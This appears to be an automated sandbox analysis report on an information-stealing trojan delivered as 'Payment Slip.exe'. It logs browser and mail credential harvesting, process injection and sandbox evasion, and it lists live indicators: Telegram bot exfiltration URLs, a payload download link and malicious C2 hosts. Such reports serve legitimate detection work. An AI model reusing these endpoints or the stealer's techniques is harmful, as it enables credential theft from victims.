          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595030Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594484Jump to behavior
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: C:\Users\user\Desktop\Payment Slip.exeAPI call chain: ExitProcess graph end nodegraph_0-3516
          Source: C:\Users\user\Desktop\Payment Slip.exeAPI call chain: ExitProcess graph end nodegraph_0-3515
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A69590 LdrInitializeThunk,7_2_04A69590
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 1700000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 19FFF4Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Masculinity.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts111
          Process Injection
          2
          Obfuscated Files or Information
          LSASS Memory116
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell
          Logon Script (Windows)Logon Script (Windows)1
          Software Packing
          Security Account Manager1
          Query Registry
          SMB/Windows Admin Shares1
          Email Collection
          21
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDS211
          Security Software Discovery
          Distributed Component Object Model1
          Clipboard Data
          1
          Non-Standard Port
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets1
          Process Discovery
          SSHKeylogging3
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
          Virtualization/Sandbox Evasion
          Cached Domain Credentials41
          Virtualization/Sandbox Evasion
          VNCGUI Input Capture24
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
          Process Injection
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481491 Sample: Payment Slip.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 4 other IPs or domains 2->38 48 Found malware configuration 2->48 50 Antivirus detection for URL or domain 2->50 52 Multi AV Scanner detection for submitted file 2->52 58 7 other signatures 2->58 8 Payment Slip.exe 1 16 2->8         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 34->54 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 file5 22 C:\Users\user\AppData\Local\...\Ropeband.San, ASCII 8->22 dropped 60 Suspicious powershell command line found 8->60 12 powershell.exe 20 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\Masculinity.exe, PE32 12->24 dropped 26 C:\Users\...\Masculinity.exe:Zone.Identifier, ASCII 12->26 dropped 62 Writes to foreign memory regions 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 66 Powershell drops PE file 12->66 16 Masculinity.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49733 TELEGRAMRU United Kingdom 16->28 30 reallyfreegeoip.org 188.114.97.3, 443, 49717, 49718 CLOUDFLARENETUS European Union 16->30 32 3 other IPs or domains 16->32 40 Multi AV Scanner detection for dropped file 16->40 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 46 Switches to a custom stack to bypass stack traces 16->46 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Payment Slip.exe32%ReversingLabsWin32.Trojan.Generic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Masculinity.exe32%ReversingLabsWin32.Trojan.Generic
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://checkip.dyndns.org0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://reallyfreegeoip.org0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
          https://api.telegram.org/bot0%Avira URL Cloudsafe
          https://api.telegram.org0%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://www.office.com/0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=enlBcq0%Avira URL Cloudsafe
          https://aka.ms/pscore6lBcq0%Avira URL Cloudsafe
          https://www.reap.skyestates.com.mt/0%Avira URL Cloudsafe
          http://checkip.dyndns.org/80%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
          https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
          http://varders.kozow.com:80810%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          http://smtp.privateemail.com100%Avira URL Cloudmalware
          http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
          http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
          http://aborters.duckdns.org:8081100%Avira URL Cloudmalware
          https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin0%Avira URL Cloudsafe
          https://www.office.com/lBcq0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.reap.skyestates.com.mt
          108.167.181.251
          truefalse
            unknown
            reallyfreegeoip.org
            188.114.97.3
            truetrue
              unknown
              api.telegram.org
              149.154.167.220
              truetrue
                unknown
                smtp.privateemail.com
                66.29.159.53
                truetrue
                  unknown
                  checkip.dyndns.com
                  193.122.6.168
                  truefalse
                    unknown
                    checkip.dyndns.org
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
